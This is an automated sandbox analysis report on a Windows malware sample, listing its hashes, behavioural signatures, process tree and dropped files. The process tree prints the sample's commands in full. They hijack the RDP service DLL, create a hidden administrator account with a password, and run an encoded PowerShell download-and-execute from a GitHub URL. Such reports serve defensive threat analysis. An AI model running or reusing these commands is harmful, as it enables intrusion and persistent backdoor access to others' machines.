Analysis
-
max time kernel
129s -
max time network
118s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
08-11-2020 17:43
General
-
Target
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
-
Size
3.4MB
-
MD5
af944f00c218cc525ef7e56f5d634cdf
-
SHA1
532a7870f610b86ef3c1eb3f10b60a9da6152bcb
-
SHA256
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
-
SHA512
62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 41 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 127 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmp" "c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 929YDPPD /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin 929YDPPD /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 929YDPPD /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin 929YDPPD1⤵
-
C:\Windows\system32\net.exenet.exe user updwin 929YDPPD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin 929YDPPD3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.dllMD5
a1b11e727dee086fd2ace43085c0cbf2
SHA199ca4a84378776ec0278a917f07228f0becae4bf
SHA25611855851592e47a78987a3ff9230360375cefb5fa85a44c958c6d49c574963fa
SHA51271b3a708ed48a69e12de1c96104ffc3aaaaa4c5513213c10df77c89e2fcbc98cfcfdc6dc01a54123cc59a1aef371fb28b543adf3ef94244748aba606b369c2f2
-
C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmpMD5
d8ffa61f8e704aef73d1fc6e0e1a5054
SHA196b69ce2d6af20fc5e205fc39d79318448043d58
SHA256d7c2e957b0fbef31521578a4b6e3ce848536e63c4cc2ecf46373c0742e237cf5
SHA5127035b06af9d0054536de8b1286fb69333296f41799208a3b601328c4848d5df15760132827933907f352d1167e1922f79e3f7884c3129cc7d1b1dd30ed27af72
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdlineMD5
ec79e044dd8372988fcd2f7eba45d055
SHA1447c522871bf66d39f99b0f6ff1ca62ae1441f04
SHA256090bd42371cf2a0a0aeefaa163e5054bcb923fee6bf74073abad0cf6fb05e4ee
SHA512f1c17ae8d87ee641f6d9f9f0ed2593e792f99285e70aa06ee205a7101fe3992391aa19afe03fe51eaf7390e9bfe407ddc8ae0befd76a9604f35b31c79b9e5035
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMPMD5
02333d8589534d3e1abbab756254b6ed
SHA1166ab7273fec3dd4cf6ae26627db35f880ff366e
SHA2569e6342d14782866affec65027e42c16f9f6f878074ec683451a7d0c2d71dfc6c
SHA512ad9907f8ef59def859a7c0b26010b8bf4cade6a4a403834a90c45151a58098c234e6467d468b701b87bf07d39f20731211ec36892e1bbba6d3e729965bc39050
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/288-56-0x0000000000000000-mapping.dmp
-
memory/340-69-0x0000000000000000-mapping.dmp
-
memory/400-66-0x0000000000000000-mapping.dmp
-
memory/400-13-0x0000000000000000-mapping.dmp
-
memory/560-57-0x0000000000000000-mapping.dmp
-
memory/564-65-0x0000000000000000-mapping.dmp
-
memory/636-53-0x0000000000000000-mapping.dmp
-
memory/688-52-0x0000000000000000-mapping.dmp
-
memory/748-54-0x0000000000000000-mapping.dmp
-
memory/752-40-0x0000000000000000-mapping.dmp
-
memory/808-76-0x0000000000000000-mapping.dmp
-
memory/872-47-0x0000000000000000-mapping.dmp
-
memory/872-77-0x0000000000000000-mapping.dmp
-
memory/900-46-0x0000000000000000-mapping.dmp
-
memory/1020-63-0x0000000000000000-mapping.dmp
-
memory/1032-0-0x00000000010C0000-0x00000000013FD000-memory.dmpFilesize
3.2MB
-
memory/1032-62-0x0000000000000000-mapping.dmp
-
memory/1032-1-0x0000000001400000-0x0000000001411000-memory.dmpFilesize
68KB
-
memory/1052-10-0x0000000000000000-mapping.dmp
-
memory/1052-49-0x0000000000000000-mapping.dmp
-
memory/1136-55-0x0000000000000000-mapping.dmp
-
memory/1184-50-0x0000000000000000-mapping.dmp
-
memory/1184-87-0x0000000000000000-mapping.dmp
-
memory/1212-70-0x0000000000000000-mapping.dmp
-
memory/1216-58-0x0000000000000000-mapping.dmp
-
memory/1316-64-0x0000000000000000-mapping.dmp
-
memory/1316-73-0x0000000000000000-mapping.dmp
-
memory/1328-48-0x0000000000000000-mapping.dmp
-
memory/1436-33-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1436-7-0x00000000024E0000-0x00000000024E1000-memory.dmpFilesize
4KB
-
memory/1436-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB
-
memory/1436-4-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/1436-5-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1436-6-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1436-2-0x0000000000000000-mapping.dmp
-
memory/1436-9-0x000000001C130000-0x000000001C131000-memory.dmpFilesize
4KB
-
memory/1436-17-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/1436-38-0x00000000022D0000-0x00000000022E0000-memory.dmpFilesize
64KB
-
memory/1436-18-0x00000000028E0000-0x00000000028E1000-memory.dmpFilesize
4KB
-
memory/1436-35-0x000000001B6E0000-0x000000001B6E1000-memory.dmpFilesize
4KB
-
memory/1436-34-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/1436-21-0x000000001B5C0000-0x000000001B5C1000-memory.dmpFilesize
4KB
-
memory/1468-61-0x0000000000000000-mapping.dmp
-
memory/1544-95-0x00000000012B0000-0x00000000012B1000-memory.dmpFilesize
4KB
-
memory/1544-99-0x0000000019490000-0x0000000019491000-memory.dmpFilesize
4KB
-
memory/1544-97-0x0000000019460000-0x0000000019461000-memory.dmpFilesize
4KB
-
memory/1544-96-0x0000000019450000-0x0000000019451000-memory.dmpFilesize
4KB
-
memory/1544-106-0x0000000019480000-0x0000000019481000-memory.dmpFilesize
4KB
-
memory/1544-98-0x0000000019480000-0x0000000019481000-memory.dmpFilesize
4KB
-
memory/1544-107-0x000000001A1B0000-0x000000001A1B1000-memory.dmpFilesize
4KB
-
memory/1544-114-0x00000000195D0000-0x00000000195D1000-memory.dmpFilesize
4KB
-
memory/1544-44-0x0000000000000000-mapping.dmp
-
memory/1544-90-0x0000000001260000-0x0000000001261000-memory.dmpFilesize
4KB
-
memory/1544-79-0x0000000000000000-mapping.dmp
-
memory/1544-80-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB
-
memory/1544-115-0x000000001AC60000-0x000000001AC61000-memory.dmpFilesize
4KB
-
memory/1556-85-0x0000000000000000-mapping.dmp
-
memory/1564-45-0x0000000000000000-mapping.dmp
-
memory/1608-43-0x0000000000000000-mapping.dmp
-
memory/1636-39-0x0000000000000000-mapping.dmp
-
memory/1684-74-0x0000000000000000-mapping.dmp
-
memory/1688-71-0x0000000000000000-mapping.dmp
-
memory/1688-41-0x0000000000000000-mapping.dmp
-
memory/1720-42-0x0000000000000000-mapping.dmp
-
memory/1736-72-0x0000000000000000-mapping.dmp
-
memory/1816-36-0x0000000000000000-mapping.dmp
-
memory/2016-78-0x0000000000000000-mapping.dmp
-
memory/2040-51-0x0000000000000000-mapping.dmp
